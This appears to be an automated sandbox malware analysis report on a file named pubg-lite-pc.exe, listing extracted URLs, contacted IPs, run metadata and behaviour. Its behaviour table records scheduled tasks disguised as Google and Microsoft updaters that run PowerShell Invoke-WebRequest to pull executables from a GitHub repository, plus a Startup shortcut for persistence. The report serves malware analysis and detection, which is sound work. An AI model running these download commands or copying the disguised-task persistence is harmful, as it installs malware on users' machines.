                                          https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_jpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.communitypowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.microsoft.cpowershell.exe, 00000011.00000002.65590219105.000002465E9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.advancedinstaller.compubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.githubassets.com/assets/global-5a9114f3bf45.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.githubassets.com/assets/dark_dimmed-0adfa28f0e68.csspowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.githubassets.com/images/modules/open_graph/github-logo.pngpowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.github.com/_private/browser/errorspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.githubassets.com/images/modules/open_graph/github-mark.pngpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.githubassets.com/assets/app_assets_modules_github_behaviors_details_ts-app_assets_modpowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.githubassets.com/assets/sessions-09e8d6375c3f.jspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://education.github.compowershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://cacerts.digicepubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exeO$epubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tl.symcb.ypubg-lite-pc.exe, 00000001.00000002.66213647590.00000000046AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://github.compowershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/fluidicon.pngpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.githubassets.com/favicons/favicon.pngpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://contoso.com/Licensepowershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/enterprise/contactpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/gowgerrie/reborn/raw/main/04/dllhost.exe&quot;powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.githubassets.com/assets/dark_tritanopia-2171ea0f078b.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://github.githubassets.com/assets/github-bbee8e363ed4.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.winimage.com/zLibDll1.2.7rbrpubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://freesharesoft.compubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://github.githubassets.com/powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://github.com/gowgerrie/rebppowershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.githubassets.com/assets/app_assets_modules_github_soft-nav_navigate_ts-8afe7373ae82.jpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://github.compowershell.exe, 00000016.00000002.65762187363.000002B402E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.66019158390.0000024B63550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://cacerts.digicert.copubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://github.com/powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.githubassets.com/assets/element-registry-f3ac80dedaa5.jspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://contoso.com/powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modulepowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.csspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://installeranalytics.compubg-lite-pc.exefalse
                                                                          		high
                                                                          https://github.com/Pester/PesterXzpowershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-e954e8c01c93.jspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_mpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://github.githubassets.com/images/modules/open_graph/github-octocat.pngpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://crl.4powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		low
                                                                            https://opensource.guidepowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nodpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helperpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://github.githubassets.com/favicons/favicon.svgpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000003.65114455500.0000020D82AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65277626545.0000020D915C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65565812606.0000024656719000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65805223151.000002B411BBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_aspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://collector.github.com/github/collectpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/gowgerrie/rebpowershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://github.githubassets.com/assets/environment-d927ab3eb595.jspowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://github.githubassets.com/pinned-octocat.svgpowershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://t1.sym7vkpubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://crl4.digicert.copubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://github.githubassets.com/static/fonts/github/alliance-1.woff2powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlXzqpowershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      140.82.121.4
                                                                                      		github.comUnited States
                                                                                      		36459GITHUBUSfalse

                                                                                      General Information

                                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                                      Analysis ID:681507
                                                                                      Start date and time:2022-08-10 06:43:38 +02:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 57s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:pubg-lite-pc.exe
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                      Run name:Potential for more IOCs and behavior
                                                                                      Number of analysed new started processes analysed:28
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal80.evad.winEXE@23/66@3/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 16.7%
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 8.8% (good quality ratio 8.5%)
                                                                                      • Quality average: 72.5%
                                                                                      • Quality standard deviation: 24.4%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 70%
                                                                                      • Number of executed functions: 90
                                                                                      • Number of non-executed functions: 209
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.31.108.18
                                                                                      • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, iris-de-prod-azsc-weu-b.westeurope.cloudapp.azure.com, arc.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, nf.smartscreen.microsoft.com, smartscreen-prod.microsoft.com, arc.msn.com
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2140 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2368 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2620 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5736 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      06:45:49API Interceptor90x Sleep call for process: powershell.exe modified
                                                                                      06:48:01Task SchedulerRun new task: BatteryBoostCheckOnLogon_{B2HP0844-0772-46L7-BAED-A80BD35AC5B8} path: powershell s>Invoke-WebRequest https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe -OutFile C:\Users\user\AppData\Local\Temp\GoogleCrashHandler.exe
                                                                                      06:48:01Task SchedulerRun new task: GoogleUpdateTask path: powershell s>Invoke-WebRequest https://github.com/gowgerrie/reborn/raw/main/04/dllhost.exe -OutFile C:\Users\user\AppData\Local\Temp\dllhost.exe
                                                                                      06:48:01Task SchedulerRun new task: GoogleUpdateTaskMachineEULA path: powershell s>Invoke-WebRequest https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe -OutFile C:\Users\user\AppData\Local\Temp\GoogleCrashHandler64.exe
                                                                                      06:48:01Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineEULA path: powershell s>Invoke-WebRequest https://github.com/gowgerrie/reborn/raw/main/04/RuntimeBroker.exe -OutFile C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                                                                                      06:48:01Task SchedulerRun new task: Warsaw's CoreFixer path: GoogleCrashHandler64.exe
                                                                                      06:48:02Task SchedulerRun new task: Win Manager path: GoogleCrashHandler.exe
                                                                                      06:48:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Crash Handler (x64).lnk

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      140.82.121.4RfORrHIRNe.docGet hashmaliciousBrowse
                                                                                      • github.com/ssbb36/stv/raw/main/5.mp3

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      collect.installeranalytics.comsetup.exeGet hashmaliciousBrowse
                                                                                      • 52.87.22.236
                                                                                      setup.exeGet hashmaliciousBrowse
                                                                                      • 52.87.22.236
                                                                                      fogL3nYNAM.exeGet hashmaliciousBrowse
                                                                                      • 18.232.16.20
                                                                                      B6A0CC1E5488C0C9F1429D1744F8C2F81F7DCE4229B83.exeGet hashmaliciousBrowse
                                                                                      • 3.209.18.1
                                                                                      NFE__8758787586875858869.msiGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      NFE__8758787586875858869.msiGet hashmaliciousBrowse
                                                                                      • 3.209.18.1
                                                                                      NFE98798698BR.msiGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      DLSP1kcJYo.msiGet hashmaliciousBrowse
                                                                                      • 3.209.18.1
                                                                                      nXJslq1j2Q.msiGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      JUV1irsrBU.msiGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      NFE-655432br.msiGet hashmaliciousBrowse
                                                                                      • 3.209.18.1
                                                                                      NFE-655432br.msiGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      wpJqviS40a.exeGet hashmaliciousBrowse
                                                                                      • 3.209.18.1
                                                                                      onYwrKS2DM.exeGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      jRvFQFBzhX.exeGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      BCV6WR-974374RF1.msiGet hashmaliciousBrowse
                                                                                      • 34.196.43.38
                                                                                      f30dab44e1b3c177c002b35c5e9a933b79345c378dbf4.exeGet hashmaliciousBrowse
                                                                                      • 3.209.18.1
                                                                                      e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exeGet hashmaliciousBrowse
                                                                                      • 3.232.36.43
                                                                                      github.comMS5v3m8m1d.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Rwwsr82vkS.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Fax_Doc_2008-08.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Package_Delivery.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Fax_Document.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      j4SGb5BB2X.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      sJq1pykxns.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Trojan.Ransom.Petya/Trojan.Ransom.Petya.zipGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      57lsAxwpQZ.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      http://blockstream.infoGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      SamplesForQuotationpdf.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Purchase Order.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Purchase Order.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      AW348LMq9m.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      P5u1ZAL6wF.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      5YB5dKZ1Ow.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      AWB00765.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Jylly Premium.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      quotation spec.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.3

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      GITHUBUSMS5v3m8m1d.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Fax_Doc_2008-08.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Package_Delivery.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Fax_Document.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      j4SGb5BB2X.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      http://1290.5EmG8FkvNc.mtca-jo.org/?=li_dong@jhancock.comGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Trojan.Ransom.Petya/Trojan.Ransom.Petya.zipGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      http://blockstream.infoGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      SamplesForQuotationpdf.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.3
                                                                                      Purchase Order.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Purchase Order.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      AW348LMq9m.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      5YB5dKZ1Ow.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      AWB00765.jarGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Jylly Premium.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      quotation spec.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      quotation spec.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      quotation spec.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      rey6j6x.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Fortnite Hack.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.W32.AIDetectNet.01.30774.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      SALES ORDER.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      SecuriteInfo.com.Trojan.Mardom.MN.9.12936.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      #Ud83c#Udfb6 voice121_076_454656_4-2(6).hTmLGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      M88jvQMmY6.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      VAKIFBANKGER011981221pdf.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Si - HL pdf.scrGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      http://sonic.myr2b.meGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      pnSQAKDF02.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      RFQ_PRBFKO_#2232T.jsGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      b2A7oMrH4k.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      MS5v3m8m1d.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      8iC0b1OvsO.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      a0hRAY6Tgm.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      iS3dXWk6LD.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      UckNa3e6s5.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
